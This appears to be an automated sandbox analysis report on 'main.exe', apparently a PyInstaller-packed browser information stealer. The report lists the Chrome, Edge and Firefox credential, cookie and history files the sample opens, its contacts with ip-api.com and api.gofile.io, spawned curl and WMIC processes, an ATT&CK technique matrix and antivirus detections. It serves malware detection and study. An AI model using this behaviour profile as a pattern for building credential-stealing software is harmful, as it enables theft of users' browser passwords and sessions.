Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA4C5E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6ABA4C5E0
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA66E70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6ABA66E70

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation
1
DLL Side-Loading
11
Process Injection
1
Virtualization/Sandbox Evasion
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
Boot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory31
Security Software Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS2
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets1
System Network Configuration Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync43
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579350 Sample: main.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 68 49 ip-api.com 2->49 51 api.gofile.io 2->51 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 AI detected suspicious sample 2->61 9 main.exe 151 2->9         started        signatures3 process4 file5 41 C:\Users\...\backend_c.cp311-win_amd64.pyd, PE32+ 9->41 dropped 43 C:\Users\user\...\_cffi.cp311-win_amd64.pyd, PE32+ 9->43 dropped 45 C:\Users\user\AppData\Local\...\shell.pyd, PE32+ 9->45 dropped 47 88 other files (none is malicious) 9->47 dropped 63 Found pyInstaller with non standard icon 9->63 13 main.exe 24 9->13         started        17 conhost.exe 9->17         started        signatures6 process7 dnsIp8 53 ip-api.com 208.95.112.1, 49732, 49733, 80 TUT-ASUS United States 13->53 55 api.gofile.io 45.112.123.126, 443, 49731, 49735 AMAZON-02US Singapore 13->55 65 Tries to harvest and steal browser information (history, passwords, etc) 13->65 19 cmd.exe 1 13->19         started        21 cmd.exe 1 13->21         started        23 cmd.exe 1 13->23         started        25 8 other processes 13->25 signatures9 process10 process11 27 WMIC.exe 1 19->27         started        29 curl.exe 1 21->29         started        31 curl.exe 1 23->31         started        33 curl.exe 1 25->33         started        35 curl.exe 1 25->35         started        37 curl.exe 1 25->37         started        39 curl.exe 1 25->39         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
main.exe24%VirustotalBrowse
main.exe100%AviraOSX/GM.ReverseShe.TH
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD5.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA1.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA224.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA256.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA384.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA512.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_keccak.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_poly1305.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Math\_modexp.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve448.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_strxor.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imaging.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingcms.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingmath.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingtk.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_webp.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\mfc140u.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\win32ui.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_brotli.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_elementtree.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pyd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
ip-api.com
208.95.112.1
truefalse
    high
    api.gofile.io
    45.112.123.126
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://api.gofile.io/serversfalse
        high
        http://ip-api.com/json/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfmain.exe, 00000002.00000003.1931699271.000001ED8D7A0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909476038.000001ED8D791000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://aka.ms/vcpython27main.exe, 00000002.00000003.1780531437.000001ED8CACE000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://github.com/mhammond/pywin32main.exe, 00000000.00000003.1729176986.00000237BBB32000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://docs.python.org/library/unittest.htmlmain.exe, 00000002.00000003.1905565915.000001ED8CAAC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780531437.000001ED8CA7E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#main.exe, 00000002.00000003.1922205226.000001ED8A3B9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908790516.000001ED8A389000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937965361.000001ED8A3BD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1757862109.000001ED8A3B7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1953102635.000001ED8C020000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911158167.000001ED8A3B7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1757279861.000001ED8A3A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952635906.000001ED8A3C5000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://tools.ietf.org/html/rfc2388#section-4.4main.exe, 00000002.00000003.1909775081.000001ED8C8C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931582451.000001ED8C8C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956891756.000001ED8C8D1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925908854.000001ED8C8C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908319790.000001ED8C8C0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907240963.000001ED8C8BA000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64main.exe, 00000002.00000003.1927231579.000001ED8C7F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922510025.000001ED8C7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C7EF000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://github.com/pypa/packagingmain.exe, 00000002.00000002.1958208064.000001ED8CC80000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958594536.000001ED8D050000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          http://www.opensource.org/licenses/mit-license.phpmain.exe, 00000002.00000003.1918350007.000001ED8D7B9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909476038.000001ED8D791000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://stackoverflow.com/questions/19622133/main.exe, 00000002.00000002.1958594536.000001ED8D050000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              https://refspecs.linuxfoundation.org/elf/gabi4main.exe, 00000002.00000002.1958208064.000001ED8CC80000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958768124.000001ED8D150000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.accv.es~dmain.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://tools.ietf.org/html/rfc3610main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935934101.000001ED8D81A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941474977.000001ED8D837000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938307594.000001ED8D82F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938854162.000001ED8D832000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://peps.python.org/pep-0205/main.exe, 00000002.00000002.1955752914.000001ED8C330000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.dhimyotis.com/certignarootca.crlmain.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925833686.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961782194.000001ED8D70A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1921292444.000001ED8D705000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941583881.000001ED8D4DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://ocsp.accv.esmain.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamemain.exe, 00000002.00000002.1952715008.000001ED8BBA0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://docs.python.org/3/library/pprint.htmlmain.exe, 00000002.00000003.1922510025.000001ED8C7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928596296.000001ED8C7FC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927231579.000001ED8C7F7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929359605.000001ED8C7FD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C7EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924738721.000001ED8C7F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688main.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952715008.000001ED8BC28000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://httpbin.org/getmain.exe, 00000002.00000003.1927169765.000001ED8CB1A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927231579.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926012954.000001ED8D4C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956596958.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924714703.000001ED8C153000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1960197370.000001ED8D47B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931812031.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929359605.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1939702681.000001ED8CB2B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4BA000.00000004.00000020.00020000.00000000.sdmp, 